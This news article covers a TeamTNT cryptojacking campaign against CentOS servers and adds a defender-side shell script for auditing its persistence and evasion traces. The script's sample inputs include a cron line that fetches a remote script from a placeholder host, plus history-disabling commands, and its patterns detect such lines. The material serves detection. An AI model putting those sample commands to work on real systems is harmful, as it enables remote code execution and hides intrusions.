TeamTNT Returns: New Cryptojacking Campaign Targets CentOS Servers
The cybercriminal group TeamTNT has resurfaced, launching a new cryptojacking campaign targeting servers running the CentOS operating system. According to Group-IB, the attackers are employing brute-force SSH attacks to infiltrate virtual servers.
Once access is gained, the hackers deploy a malicious script that disables security mechanisms, deletes logs, halts competing mining processes, and hinders system recovery. Following this sequence of actions, the hackers install the Diamorphine rootkit, which conceals malicious processes and ensures remote access to the compromised hosts.
Researchers, with moderate confidence, attribute the detected attacks to TeamTNT due to the similarity of tactics and techniques seen in their previous operations. TeamTNT was first observed in 2019 conducting illegal cryptocurrency mining on cloud and container platforms. In 2021, the group announced its disbandment, yet since 2022, new attacks linked to this group have been increasingly reported.
In the latest campaign, the malicious script first scans the infected system for traces of other cryptojacking operations. It then disables security systems such as SELinux, AppArmor, and the firewall. Special attention is given to the “aliyun.service,” associated with the cloud provider Alibaba. If this service is detected, the script issues commands to remove it, freeing up resources for its own operations.
As noted earlier, the script eliminates competitors by killing processes of other miners, deleting their containers, and erasing associated images. To maintain control over the server, the attackers configure cron jobs that download updates from a remote server every 30 minutes. Additionally, they modify the SSH authorization file, adding a root account for persistent access.
To cover their tracks, the criminals alter file attributes, create administrator-access accounts, and erase command history.
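The behaviours described above (a cron job that pulls from a remote server, an added SSH authorization entry, altered file attributes, disabled SELinux/AppArmor, erased shell history) each leave an artifact a defender can audit. The script below is an added example written for this article, not code from Group-IB's report or from the campaign itself. Every check reads text on stdin so it can run offline against captured files or command output; the sample inputs at the bottom are constructed for illustration. The specific patterns it looks for (curl/wget in cron, the immutable bit on `authorized_keys`, `unset HISTFILE` in start-up files) are this example's assumptions about how such changes commonly appear, not details quoted from the report.

```shell
#!/bin/sh
# Added example, not part of the original article: defender-side audit helpers
# for the persistence and evasion behaviours the article attributes to the
# campaign. Functions read stdin and print only the lines worth a closer look,
# so they can be run against a live host or against evidence collected from it.

# Cron lines that download from a remote URL with curl or wget. The article
# describes a cron job fetching updates from a remote server every 30 minutes.
suspicious_cron() {
    grep -v '^[[:space:]]*#' | grep -E '(curl|wget)[^#]*(https?|ftp)://'
    return 0
}

# authorized_keys entries whose trailing comment is not in the allowlist given
# as $1 (space separated). Entries without a comment are reported too, since
# they cannot be tied to a known owner. The article: the attackers add an entry
# to the SSH authorization file for persistent root access.
unknown_ssh_keys() {
    allow=" $1 "
    while read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        comment=${line##* }
        case "$allow" in *" $comment "*) ;; *) printf '%s\n' "$line" ;; esac
    done
    return 0
}

# lsattr output (flags then path) where a file carries the immutable 'i' bit.
# The article says the script alters file attributes; that the change is the
# immutable bit on files like authorized_keys or crontabs is this example's
# assumption.
immutable_files() {
    awk '$1 ~ /i/ && $2 != "" { print $2 }'
    return 0
}

# Shell start-up text that turns command history off. The article says the
# attackers erase command history; these patterns are the usual ways of doing
# so in a start-up file (assumption, not quoted from the report).
history_tampering() {
    grep -E 'HISTFILE=/dev/null|unset[[:space:]]+HISTFILE|HISTSIZE=0|history[[:space:]]+-c'
    return 0
}

# getenforce / aa-status style output showing SELinux or AppArmor is not
# enforcing. The article lists SELinux, AppArmor and the firewall among the
# disabled controls.
mac_disabled() {
    grep -Ei '^(Disabled|Permissive)$|apparmor module is not loaded'
    return 0
}

# Constructed sample evidence (not real campaign artifacts).
cron_sample='# m h dom mon dow command
*/30 * * * * curl -fsSL http://example.invalid/update.sh -o /tmp/update.sh
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf'
keys_sample='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyData admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDExampleKeyData root@unknown'
lsattr_sample='----i---------e------- /root/.ssh/authorized_keys
--------------e------- /etc/crontab'
rc_sample='export PATH=/usr/local/bin:$PATH
unset HISTFILE
export HISTSIZE=0'

# Usage: on a real host replace the samples with, for example,
#   cat /etc/crontab /etc/cron.d/* | suspicious_cron
#   lsattr /root/.ssh/authorized_keys /etc/crontab | immutable_files
printf '== cron fetching remote content ==\n%s\n' "$(printf '%s\n' "$cron_sample" | suspicious_cron)"
printf '== SSH keys not in allowlist ==\n%s\n'   "$(printf '%s\n' "$keys_sample" | unknown_ssh_keys 'admin@workstation')"
printf '== immutable files ==\n%s\n'            "$(printf '%s\n' "$lsattr_sample" | immutable_files)"
printf '== history tampering ==\n%s\n'          "$(printf '%s\n' "$rc_sample" | history_tampering)"
printf '== MAC status ==\n%s\n'                 "$(printf 'Disabled\n' | mac_disabled)"
```

Each function prints nothing when the input is clean, so the script can be dropped into a monitoring job that alerts only on non-empty output; the allowlist for `unknown_ssh_keys` should be the set of key comments your provisioning actually installs.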
The ongoing attacks by TeamTNT vividly demonstrate that a lull in cyberspace is merely an illusion. Hackers do not vanish—they evolve. Every server is a potential target, and safeguarding it requires continuous vigilance.